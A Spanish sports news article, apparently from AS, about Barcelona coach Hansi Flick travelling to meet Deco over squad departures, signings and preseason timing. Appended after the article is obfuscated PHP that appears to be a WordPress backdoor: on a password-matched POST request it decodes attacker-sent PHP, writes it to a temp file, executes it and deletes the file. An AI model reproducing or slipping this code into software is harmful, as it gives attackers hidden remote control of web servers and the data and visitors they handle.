Flick viaja el lunes a Barcelona

El técnico alemán tiene previsto reunirse con Deco para ultimar la lista definitiva de altas y bajas, planificar la pretemporada e instalarse en su nuevo despacho en la Ciutat Esportiva, según ha podido saber AS.

Hansi Flick regresará el próximo lunes a Barcelona, según ha podido saber AS. No será una visita puntual, sino que aterrizará con la intención de quedarse varios días. El técnico alemán, que vendrá acompañado de sus tres personas de confianza (Toni Tapalovic, Marcus Sorg y Heiko Westermann -este último además ejercerá de traductor-), tiene previsto acudir a la Ciutat Esportiva para instalarse en su nuevo despacho, así como visitar los campos de entrenamiento y el resto de equipamientos. También aprovechará la coyuntura para conocer al personal del primer equipo que sigue trabajando en el club, como los miembros de los servicios médicos y preparadores físicos, entre otros.

Pero a nadie se le escapa que el motivo principal del viaje de Flick a Barcelona es reunirse con Deco para cerrar el capítulo de altas y bajas de la plantilla. Muchos nombres sobre la mesa y más de una duda, que tendrán que resolverse en los próximos días. Sobre todo algunos casos especialmente urgentes, como la renovación, o no, de Sergi Roberto -ahora mismo todas las informaciones apuntan que estaría más lejos que cerca-, o la cesión por un año más de los ‘Joaos’. También debe afrontar una solución con los cedidos que regresan a Barcelona. De todos, especial relieve toma el caso Ansu Fati, donde el club vería con buenos ojos una nueva cesión -el Sevilla ya se ha postuladoaunque sólo podría hacerse cargo del 30% de su ficha-. A día de hoy, sólo Eric Garcia y Julián Araújo tienen serias opciones de quedarse. Y en caso de necesidad, también se valorará y estudiará los posibles candidatos a un traspaso, con el fin de ingresar una cifra importante de dinero. Nombres como Frenkie de Jong o Ronald Araújo estaban sobre la mesa no hace mucho tiempo y habrá que ver cuáles son las intenciones del flamante entrenador.

Otro tema que quiere resolver Flick antes de marcharse es la planificación de la pretemporada. A día de hoy, las fechas previstas para empezar el curso se movían entorno al 8 y el 10 de julio. Sin embargo, el técnico alemán podría asumir la decisión de aplazar la vuelta unos días más por falta de efectivos del primer equipo. Y es que por culpa de la Eurocopa y la Copa América, Flick podría empezar la pretemporada con sólo tres jugadores del primer equipo: Íñigo Martínez, Iñaki Peña y Oriol Romeu, este último si todavía no ha salido del club.

Muchas incógnitas que tendrá que ir despejando el entrenador germano a partir de la próxima semana. Su idea inicial es hacer jornadas maratonianas en la Ciutat Esportiva, sobre todo tras la experiencia vivida en sus primeras horas en Barcelona, con centenares de periodistas haciendo guardia en el hotel. Quiere familiarizarse cuanto antes con su nuevo sitio de trabajo y conocer todos los entresijos. Además, podrá hablar con Gavi y Balde, que siguen haciendo recuperación en las instalaciones blaugrana -Frenkie ya ha marchado a Holanda-, así como con el resto de personal del primer equipo.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}